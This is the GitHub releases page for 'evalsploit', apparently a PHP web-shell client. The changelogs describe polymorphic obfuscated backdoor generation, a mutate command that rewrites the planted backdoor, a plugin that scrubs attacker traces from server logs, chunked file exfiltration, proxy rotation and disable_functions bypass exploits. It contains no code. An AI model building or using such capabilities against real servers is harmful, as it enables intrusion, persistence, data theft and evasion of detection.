Skip to content

Releases: MarkTauber/evalsploit

Evalsploit [3.1.0]

02 Mar 18:28
@MarkTauber MarkTauber
v3.1.0
712f7b3

Choose a tag to compare

View all tags
Evalsploit [3.1.0] Latest
Latest

[v3.1.0] - 2026-03-02

Changelog

Notable changes compared to the previous codebase (evalsploit, 3.0.0).

[3.1.0]

New commands

  • sql - Interactive SQL console via PDO. Supports MySQL and PostgreSQL in one command (sql user:pass@host[:port][/db]). Verifies connection before entering the REPL. USE dbname is handled client-side by rebuilding the PDO DSN - no extra HTTP request. DSN auto-saved to settings.ini on successful connect.
  • grep - Recursive file content search using RecursiveIteratorIterator. Accepts PHP regex with optional -i flag. No exec required.
  • find - Recursive filename search using RecursiveIteratorIterator. PHP regex, case-insensitive by default. No exec required.

New plugin

  • clearlog - Removes matching lines from server log files. Three modes:
    • clearlog detect - scans common log paths via glob(), shows [rw]/[r-] write status for each file.
    • clearlog all [pattern] - cleans all writable logs; skips read-only files; requires confirmation.
    • clearlog <path> [pattern] - cleans a single file.
    • Default pattern: URL path from session config (e.g. /shell.php).

Chunked download

  • Added dl_chunked.php snippet: uses fseek/fread to transfer files in 1 MB blocks per request. PHP memory_limit no longer limits download size.
  • Live progress bar: 45.0 MB / 512.0 MB (8%), updated per chunk.
  • Switch with set download chunked / set download dl (default).
  • Detection is automatic: dl_mod.py uses chunked logic whenever the loaded snippet contains $_OFFSET.

PHP 8 improvements

  • mutate - Now auto-detects PHP version before generating the replacement backdoor. PHP ≥ 8: uses generate_php8_backdoor() (eval-based, no create_function). PHP < 8: uses generate_polymorphic_backdoor() (create_function via variable, obfuscated). Version and mutator type printed before rewriting the file.
  • gen / payload menu - The create_function bypass variant is now labeled "Function bypass (PHP < 8 only)" to prevent accidentally deploying it on PHP 8 targets.

Bug fixes

  • rename.php - Previously produced no output; the Python module always printed "Renamed" regardless of success. Snippet now outputs OK on success and ERR on failure; ren_mod.py checks the result.
  • stat.php - stat() return value was not checked. On a missing or unreadable path, the code crashed trying to access $stat['size'] on false. Added @stat() with a === false guard and an ERR: cannot stat message. Also fixed a log(0) division-by-zero on zero-size files.
  • sql_query_php.php - With PDO::ERRMODE_EXCEPTION, query() throws on failure and never returns false. The if (!$_stmt) branch was unreachable dead code. Removed; the result-display path now runs unconditionally.
  • mf.php / create - create reported "File created" even when the file already existed (the snippet silently did nothing). Snippet now outputs EXISTS when the file is present; mkf_mod.py reports "File already exists".
Assets 3
Loading

Evalsploit [3.0.0]

01 Mar 01:31
@MarkTauber MarkTauber
v3.0.0
62b335d

Choose a tag to compare

View all tags
Evalsploit [3.0.0]

[v3.0.0] - 2026-03-01

Changelog

Notable changes compared to the previous codebase (evalsploit 2.7.x).

[3.0.0]

Architecture and install

  • Package layout – Single script and flat modules/ replaced by installable package evalsploit (pyproject.toml, pip install -e .). Entry point: evalsploit or python -m evalsploit.
  • Startup menu – On start: choose Payload / Session / URL / Last connection / Proxies / Exit. No more single URL + proxy prompts; session can be restored or new URL entered.
  • Data layout – Settings, sessions, and useragents live under data/ (e.g. data/settings.ini, data/sessions/, data/useragents). .gitignore added for local data and build/IDE artifacts.

Sessions and config

  • Sessions – Save current connection (URL, Z, V, send_mode) with save <name>; list with sessions; switch with connect <name> or by number at startup. Replaces “leave URL empty to restore last” with explicit named sessions.
  • Config – Single config object (dataclass) with load/save for global settings and per-session overrides. No config file read on every send.
  • set – Unified set <module> <value> and set <module> help for run, ls, cat, send, silent, reverse, confirm, proxy. Messages in English.

Transport and payload

  • Send modes – Same modes (bypass, classic, simple); Z and V taken from config (no hardcoded Z in classic). On connect, client tries each mode and stores the working one (unless silent).
  • Polymorphic payloads – Backdoor generation with multiple shapes (if/do/while/for), obfuscated create_function, str_replace/strtr/preg_replace (including XOR). PHP 8 variant without create_function. gen prints payloads for current send mode and Z, V.
  • Mutation – Replaces the backdoor line in the infected file on the server with a new polymorphic payload and updates local Z, V. No separate “reset”;

Proxy

  • Proxy list – Proxies loaded from data/proxies.txt (one host:port per line). Validation via HTTP request; list of validated indices. One proxy per session (random or by index).
  • proxy_switch – Change current proxy without leaving the shell: no args (new random), N (proxy #), or random.

Commands and UX

  • Exploit – Single exploit command: no args → menu by ID (1–N from EXPLOIT_DIRS, Enter = default 7.3–8.1, 0 = back); with arg (e.g. exploit 7.0-7.4) use that bypass directly. Replaces four separate exploit functions and fixed prompt.
  • Paths – Two-path commands (cp, ren/mv, upload with remote path, download to path) use : as separator; paths may contain spaces.
  • Confirm – Optional confirmation for dangerous actions (rm/del, upload, mutate, edit); set confirm 0/1.
  • try / detect – Check which run variants (exec, shell_exec, etc.) work on the server.
  • help – In-session help for commands; no banner dump.

Plugins and snippets

  • Plugins – Custom commands via Python modules in evalsploit/plugins/ (registry, no core edits).
  • Snippets – Command behaviour (rm, dl, upload, rename, stat, touch, mkdir, create, copy) configurable via evalsploit/modules/snippets/snippets.ini and set <cmd> <style>.

Removed / simplified

  • Language – CLI and built-in messages in English; README in EN, RU, ZH.
  • reset – Removed; use new session or change Z, V via mutate/gen and config.
  • Banner – No long ASCII banner at start; minimal startup menu.

Technical

  • Python – Requires Python 3.10+.
  • Dependenciesrequests; no configparser in hot path.
  • Send – Centralized in evalsploit.transport.send; marker-based output parsing (ignore everything before marker).
Loading

Evalsploit [2.6.0]

15 Aug 00:47
@MarkTauber MarkTauber
v2.6.0
921a7d4
This commit was created on GitHub.com and signed with GitHub’s verified signature. The key has expired.
GPG key ID: 4AEE18F83AFDEB23
Expired
Verified
Learn about vigilant mode.

Choose a tag to compare

View all tags
Evalsploit [2.6.0]

[v2.6.1] - 2023-08-15

Loading